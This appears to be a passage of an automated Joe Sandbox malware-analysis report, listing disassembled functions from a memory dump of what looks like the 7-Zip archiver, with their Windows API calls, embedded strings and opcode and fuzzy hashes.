data:, xrefs: 00B93738

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$free$memset$strlen$memmove
String ID: data:
API String ID: 527563900-3222861102
Opcode ID: 4b6c5f9cdd3633745e31563a8c4377074848a1f4c9f847770a3d002162f2b606
Instruction ID: dbc0b66524ef90ad6a3912481650327051209be182a2c26e48d4bcc11e100cfe
Opcode Fuzzy Hash: 4b6c5f9cdd3633745e31563a8c4377074848a1f4c9f847770a3d002162f2b606
Instruction Fuzzy Hash: 51022432209681D7DF20DF29E8907AE77E0F795B88F4450A1EF4A47669DB78CA49C740

Function 00B8FA0C Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 489COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00B8FAAC
free.MSVCRT ref: 00B8FAC0
free.MSVCRT ref: 00B8FC43

Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F

Part of subcall function 00B8F820: _CxxThrowException.MSVCRT ref: 00B8F88D

free.MSVCRT ref: 00B90031

Part of subcall function 00B8F8B8: memmove.MSVCRT ref: 00B8F91E
Part of subcall function 00B8F8B8: free.MSVCRT ref: 00B8F926

Part of subcall function 00B8F93C: memmove.MSVCRT ref: 00B8F992
Part of subcall function 00B8F93C: free.MSVCRT ref: 00B8F99A

free.MSVCRT ref: 00B900EA
free.MSVCRT ref: 00B900F2
free.MSVCRT ref: 00B90101
free.MSVCRT ref: 00B9010A
free.MSVCRT ref: 00B90113
free.MSVCRT ref: 00B90121
_CxxThrowException.MSVCRT ref: 00B90184

Strings

Duplicate filename on disk:, xrefs: 00B8FCB4
Internal file name collision (file on disk, file in archive):, xrefs: 00B9015D
Duplicate filename in archive:, xrefs: 00B90149

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ExceptionThrow$memmove$mallocmemset
String ID: Duplicate filename in archive:$Duplicate filename on disk:$Internal file name collision (file on disk, file in archive):
API String ID: 3338823681-819937569
Opcode ID: 05e571fda14d9d8926fc305dd0170e713781fc1b859d5d94d2c1757528fd9615
Instruction ID: e45c9fd727e8950c46b6f998e285fb2c60b90470cf34408b4471cd2a35693430
Opcode Fuzzy Hash: 05e571fda14d9d8926fc305dd0170e713781fc1b859d5d94d2c1757528fd9615
Instruction Fuzzy Hash: 7C12937321968587CB20EF25E48066EB7E1F389B90F504665EF9A47B68CF38D895CF00

Function 00B6AF58 Relevance: 11.7, APIs: 9, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eb9012123f2ce8eb073f9b3624da2f3a3289b8457f20c18abc7480cb7118cc2
Instruction ID: a249db0e6000c455ad39674d0bb92d979960d0f3201b874d884e2c8affc88cb7
Opcode Fuzzy Hash: 1eb9012123f2ce8eb073f9b3624da2f3a3289b8457f20c18abc7480cb7118cc2
Instruction Fuzzy Hash: FD022E32309B8196DA24DF25E4907AEB3A1F7C5B84F544166DB8E97B69DF7CC884CB00

Function 00B58F18 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 142COMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32 ref: 00B58F7A
DeviceIoControl.KERNEL32 ref: 00B5905E
DeviceIoControl.KERNEL32 ref: 00B590B5
DeviceIoControl.KERNEL32 ref: 00B590F6

Part of subcall function 00B5ABB0: GetModuleHandleW.KERNEL32 ref: 00B5ABD1
Part of subcall function 00B5ABB0: GetProcAddress.KERNEL32 ref: 00B5ABE1
Part of subcall function 00B5ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 00B5AC32

Strings

:, xrefs: 00B58FF2
(, xrefs: 00B59051

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ControlDevice$AddressDiskFreeHandleModuleProcSpace
String ID: ($:
API String ID: 4250411929-4277925470
Opcode ID: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
Instruction ID: 49add898ffde4eb234ec9a84c28380d770b898c6f6a3874000b9e87812fc0118
Opcode Fuzzy Hash: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
Instruction Fuzzy Hash: 1051AD33608BC1D6CB21DF20F45079EB7A5F384764F5885A6DB8A47B58EB79C4A8CB40

Function 00B5881C Relevance: 10.6, APIs: 7, Instructions: 102COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B5885B
free.MSVCRT ref: 00B58863
GetLogicalDriveStringsW.KERNEL32 ref: 00B58879
GetLogicalDriveStringsW.KERNEL32 ref: 00B588B2
free.MSVCRT ref: 00B58943
free.MSVCRT ref: 00B5894C
free.MSVCRT ref: 00B58959

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$DriveLogicalStrings
String ID:
API String ID: 837055893-0
Opcode ID: 3de173a54933036e0db587b8e1d0ec2bc758cc62df0222796deffbdb40624916
Instruction ID: aa96f3326f709ab4c8cc72292d1835172224c1b001fb48c9b6b976d390b08e35
Opcode Fuzzy Hash: 3de173a54933036e0db587b8e1d0ec2bc758cc62df0222796deffbdb40624916
Instruction Fuzzy Hash: F131B523302A4145DA31EF22E85136B62D1EB85BEAF4852F49E5E67384DF38C94EC700

Function 00B596AC Relevance: 10.6, APIs: 7, Instructions: 88COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B596D1
GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 00B59723
DeviceIoControl.KERNEL32 ref: 00B5976C
free.MSVCRT ref: 00B59779
free.MSVCRT ref: 00B59796
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 00B597C4
free.MSVCRT ref: 00B597CD

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ControlDeviceFileHandleInformationmemmove
String ID:
API String ID: 2572579059-0
Opcode ID: 81d8e5875d3dc795eb3d600148a840ab749245db3ba8f1a9a9afcbd51cdf2eb3
Instruction ID: 1d267fda30397ae680708173e8d10dcc1ebd0e4a226412b8b48ac33d931415a7
Opcode Fuzzy Hash: 81d8e5875d3dc795eb3d600148a840ab749245db3ba8f1a9a9afcbd51cdf2eb3
Instruction Fuzzy Hash: 3E31A632216E40C5DA309F11F95036AB3A4E386BE1F5842A1EFE947B95DF39C8998700

Function 00B9DBA0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 00B9DBB4
GetVersionExW.KERNEL32 ref: 00B9DBBF
GetModuleHandleW.KERNEL32 ref: 00B9DBDE
GetProcAddress.KERNEL32 ref: 00B9DBEE

Strings

SetDefaultDllDirectories, xrefs: 00B9DBE4
kernel32.dll, xrefs: 00B9DBD7

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: Version$AddressHandleModuleProc
String ID: SetDefaultDllDirectories$kernel32.dll
API String ID: 2268189529-2102062458
Opcode ID: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
Instruction ID: b370060b070cda814f0ce2d5c38b4f79ea9e1c3fe9d5e3a065b8db529418c58b
Opcode Fuzzy Hash: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
Instruction Fuzzy Hash: 7FF0F875209602C2EF349B51F8543A933B0FB89719F850275D24E812B4EF3CC64DCB10

Function 00B5ABB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00B5ABD1
GetProcAddress.KERNEL32 ref: 00B5ABE1
GetDiskFreeSpaceW.KERNEL32 ref: 00B5AC32

Strings

GetDiskFreeSpaceExW, xrefs: 00B5ABD7
kernel32.dll, xrefs: 00B5ABBE

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: AddressDiskFreeHandleModuleProcSpace
String ID: GetDiskFreeSpaceExW$kernel32.dll
API String ID: 1197914913-1127948838
Opcode ID: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
Instruction ID: ac50366be844c671954a3b0875cea191b86ee92c569c8d7adcaad4da80b36f7f
Opcode Fuzzy Hash: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
Instruction Fuzzy Hash: ED11673231AB4696DB10CF55F880BAAB364F794B90F449022EF8E43728EF38C559CB00

Function 00B5B114 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188timeCOMMON

Download Yara Rule

APIs

FileTimeToLocalFileTime.KERNEL32 ref: 00B5B12A
FileTimeToSystemTime.KERNEL32 ref: 00B5B13E

Strings

gfff, xrefs: 00B5B1D7

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: Time$File$LocalSystem
String ID: gfff
API String ID: 1748579591-1553575800
Opcode ID: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
Instruction ID: f80d9b9e89e209ed2a1f4fab763c7a817e0805d3b5e1a80113e37621772724bc
Opcode Fuzzy Hash: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
Instruction Fuzzy Hash: 89519793B042C08BE7198B3DD846BDDBFC1E3A5758F08826ADB95C7785E26DC50AC721

Function 00B5B5E0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

Part of subcall function 00B5B5B8: GetCurrentProcess.KERNEL32 ref: 00B5B5C2

GetSystemInfo.KERNEL32 ref: 00B5B624

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: CurrentInfoProcessSystem
String ID:
API String ID: 1098911721-0
Opcode ID: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
Instruction ID: 8fd4594baf2362a5afe4c8736c6f1ed58fc455702d743cf1fa5a0a7f8af0d893
Opcode Fuzzy Hash: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
Instruction Fuzzy Hash: 38E0ED6662449583CA70DB08E552B69F3A0F7A4746FC05691EA8A82E14DF2DC6588F00

Function 00B9D690 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34068706c2d5e8e26acb18a5d787bd8c28d1e0f249bc181dd9bcec1cf4fba99d
Instruction ID: 28c2724fb23dbda97642d8b7dd185ece33fef4764bb070aebcff4110c2f5ae3c
Opcode Fuzzy Hash: 34068706c2d5e8e26acb18a5d787bd8c28d1e0f249bc181dd9bcec1cf4fba99d
Instruction Fuzzy Hash: 2CE042F290A2058FD3D98F6AD4412587EE4F748795B60C13FA608D3301D37581888F92

Function 00B70C24 Relevance: 97.9, APIs: 78, Instructions: 364COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B70CC6
free.MSVCRT ref: 00B70CD0
free.MSVCRT ref: 00B70CE6
free.MSVCRT ref: 00B70CF0

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
Instruction ID: cbe7dd28b9158d3dec14a234cd676982ab3ff8d224440e2629629f59a780b3fd
Opcode Fuzzy Hash: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
Instruction Fuzzy Hash: 49D19F2335798081DA50FF25E49175FA7A0E7C3785F5051D2AF9EA7B29DE28C84ACF04

Function 00B82A7D Relevance: 44.0, APIs: 35, Instructions: 257COMMON

Download Yara Rule

APIs

Part of subcall function 00B7E7A0: free.MSVCRT ref: 00B7E81E
Part of subcall function 00B7E7A0: free.MSVCRT ref: 00B7E828
Part of subcall function 00B7E7A0: free.MSVCRT ref: 00B7E832
Part of subcall function 00B7E7A0: free.MSVCRT ref: 00B7E83C

free.MSVCRT ref: 00B82AD7
free.MSVCRT ref: 00B82AE2
free.MSVCRT ref: 00B82AEB
free.MSVCRT ref: 00B82AF6
free.MSVCRT ref: 00B82B04
free.MSVCRT ref: 00B82B26
free.MSVCRT ref: 00B82B2F
free.MSVCRT ref: 00B82B3D
free.MSVCRT ref: 00B82B48
free.MSVCRT ref: 00B82C3E
free.MSVCRT ref: 00B82C49
free.MSVCRT ref: 00B82C52
free.MSVCRT ref: 00B82C5D
free.MSVCRT ref: 00B82C6B
free.MSVCRT ref: 00B82C8D
free.MSVCRT ref: 00B82C96
free.MSVCRT ref: 00B82CA4
free.MSVCRT ref: 00B82CAF
free.MSVCRT ref: 00B82CE3
free.MSVCRT ref: 00B82CEE
free.MSVCRT ref: 00B82CF7
free.MSVCRT ref: 00B82D08
free.MSVCRT ref: 00B82D16
free.MSVCRT ref: 00B82D3D
free.MSVCRT ref: 00B82D46
free.MSVCRT ref: 00B82D54
free.MSVCRT ref: 00B82D5F
free.MSVCRT ref: 00B82D73
free.MSVCRT ref: 00B82D85
free.MSVCRT ref: 00B82D93
free.MSVCRT ref: 00B82DBA
free.MSVCRT ref: 00B82DC3
free.MSVCRT ref: 00B82DD1
free.MSVCRT ref: 00B82DDC
free.MSVCRT ref: 00B82DEA

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
Instruction ID: 655b14365e1a65834ace5a589c738b6c5e38007e8b3e1f80eca707850df4cff1
Opcode Fuzzy Hash: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
Instruction Fuzzy Hash: A491F733307A8486CA24EF36D4A5A6E67A0F787F86B0554E1DF5E63721CE28C449CB05

Function 00B71DB4 Relevance: 41.7, APIs: 33, Instructions: 418COMMON

Download Yara Rule

APIs

Part of subcall function 00B53314: memmove.MSVCRT ref: 00B53339

Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F

free.MSVCRT ref: 00B71EAE
free.MSVCRT ref: 00B71EB6
free.MSVCRT ref: 00B71EC4
free.MSVCRT ref: 00B71EF2
free.MSVCRT ref: 00B71EFA
free.MSVCRT ref: 00B71F08
free.MSVCRT ref: 00B71F40
free.MSVCRT ref: 00B71F48
free.MSVCRT ref: 00B71F5B
free.MSVCRT ref: 00B71FDE
free.MSVCRT ref: 00B72010
free.MSVCRT ref: 00B72018
free.MSVCRT ref: 00B72026
free.MSVCRT ref: 00B720E2
free.MSVCRT ref: 00B72114
free.MSVCRT ref: 00B7211C
free.MSVCRT ref: 00B7212A
free.MSVCRT ref: 00B7218F
free.MSVCRT ref: 00B72197
free.MSVCRT ref: 00B721A5
free.MSVCRT ref: 00B721E1
free.MSVCRT ref: 00B721E9
free.MSVCRT ref: 00B721F7
free.MSVCRT ref: 00B72235
free.MSVCRT ref: 00B7223D
free.MSVCRT ref: 00B7224B

Part of subcall function 00B70554: free.MSVCRT ref: 00B705FD
Part of subcall function 00B70554: free.MSVCRT ref: 00B70607
Part of subcall function 00B70554: free.MSVCRT ref: 00B70612

free.MSVCRT ref: 00B722CD
free.MSVCRT ref: 00B722D5
free.MSVCRT ref: 00B722E3
free.MSVCRT ref: 00B723A0
free.MSVCRT ref: 00B723A8
free.MSVCRT ref: 00B723B6
free.MSVCRT ref: 00B723C4

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ExceptionThrowmallocmemmove
String ID:
API String ID: 3352498445-0
Opcode ID: 060a242fe419d18ace11e0b1f05433c8320572bf80c973ccad8851887f661016
Instruction ID: 34ffd63b228687c8873331413a03c3cac10551b6d56dda1dcbd0af91c3061f28
Opcode Fuzzy Hash: 060a242fe419d18ace11e0b1f05433c8320572bf80c973ccad8851887f661016
Instruction Fuzzy Hash: 39E1A933705AD086CA30FF15E48129EA7E0F786BD1F4581A6EFAD67B15DE68C846CB40

Function 00B605A0 Relevance: 40.7, APIs: 25, Strings: 2, Instructions: 209COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 00B60624
memmove.MSVCRT ref: 00B6070D
free.MSVCRT ref: 00B607AA
free.MSVCRT ref: 00B607B8
free.MSVCRT ref: 00B607C5
free.MSVCRT ref: 00B607D2
free.MSVCRT ref: 00B607DF
free.MSVCRT ref: 00B607EC
free.MSVCRT ref: 00B607F9
free.MSVCRT ref: 00B60806
free.MSVCRT ref: 00B60810
free.MSVCRT ref: 00B6081B
free.MSVCRT ref: 00B60843

Part of subcall function 00B5339C: free.MSVCRT ref: 00B533D7
Part of subcall function 00B5339C: memmove.MSVCRT(00000000,?,?,00000000,00B510A8), ref: 00B533F2

free.MSVCRT ref: 00B6084D

Part of subcall function 00B53274: memmove.MSVCRT ref: 00B532AC

free.MSVCRT ref: 00B60859
free.MSVCRT ref: 00B60867
free.MSVCRT ref: 00B60874
free.MSVCRT ref: 00B60881
free.MSVCRT ref: 00B6088E
free.MSVCRT ref: 00B6089B
free.MSVCRT ref: 00B608A8
free.MSVCRT ref: 00B608B5
free.MSVCRT ref: 00B608BF
free.MSVCRT ref: 00B608CA

Part of subcall function 00B53404: free.MSVCRT ref: 00B53431
Part of subcall function 00B53404: memmove.MSVCRT ref: 00B5344C

Part of subcall function 00B5FBE4: memmove.MSVCRT ref: 00B5FC3F

_CxxThrowException.MSVCRT ref: 00B60900

Strings

pqrxyzw, xrefs: 00B60656
incorrect update switch command, xrefs: 00B608E3

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove$ExceptionThrow
String ID: incorrect update switch command$pqrxyzw
API String ID: 3957182552-3922825594
Opcode ID: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
Instruction ID: 1be5084dbb1a8cb03e8c791c5b4be69722a4cd6f82922586a0db51b1340f3fb2
Opcode Fuzzy Hash: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
Instruction Fuzzy Hash: 4881722322698492CB20EF16D89176F73A0F7C5B85F4051E2EF9E57765DE38C94ACB40

Function 00B55D18 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 328COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 00B55D69
free.MSVCRT ref: 00B55DB7
free.MSVCRT ref: 00B55DBF
wcscmp.MSVCRT ref: 00B55E09
wcscmp.MSVCRT ref: 00B55E63
wcscmp.MSVCRT ref: 00B55E77
free.MSVCRT ref: 00B55F32
free.MSVCRT ref: 00B55F3A
memmove.MSVCRT ref: 00B55F4F
free.MSVCRT ref: 00B5603B
free.MSVCRT ref: 00B56046
free.MSVCRT ref: 00B5608D
free.MSVCRT ref: 00B56095

Part of subcall function 00B53314: memmove.MSVCRT ref: 00B53339

Part of subcall function 00B5B8F0: memmove.MSVCRT ref: 00B5B932
Part of subcall function 00B5B8F0: free.MSVCRT ref: 00B5B93A

free.MSVCRT ref: 00B560F3

Part of subcall function 00B559E0: free.MSVCRT ref: 00B55ABB
Part of subcall function 00B559E0: free.MSVCRT ref: 00B55ACE
Part of subcall function 00B559E0: free.MSVCRT ref: 00B55AD6
Part of subcall function 00B559E0: memmove.MSVCRT ref: 00B55AEE

free.MSVCRT ref: 00B561A8
free.MSVCRT ref: 00B561B0
free.MSVCRT ref: 00B561BF
free.MSVCRT ref: 00B561CA
free.MSVCRT ref: 00B561EE
free.MSVCRT ref: 00B561F6
free.MSVCRT ref: 00B56202

Strings

Empty file path, xrefs: 00B55D53

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove$wcscmp$ExceptionThrow
String ID: Empty file path
API String ID: 462375450-1562447899
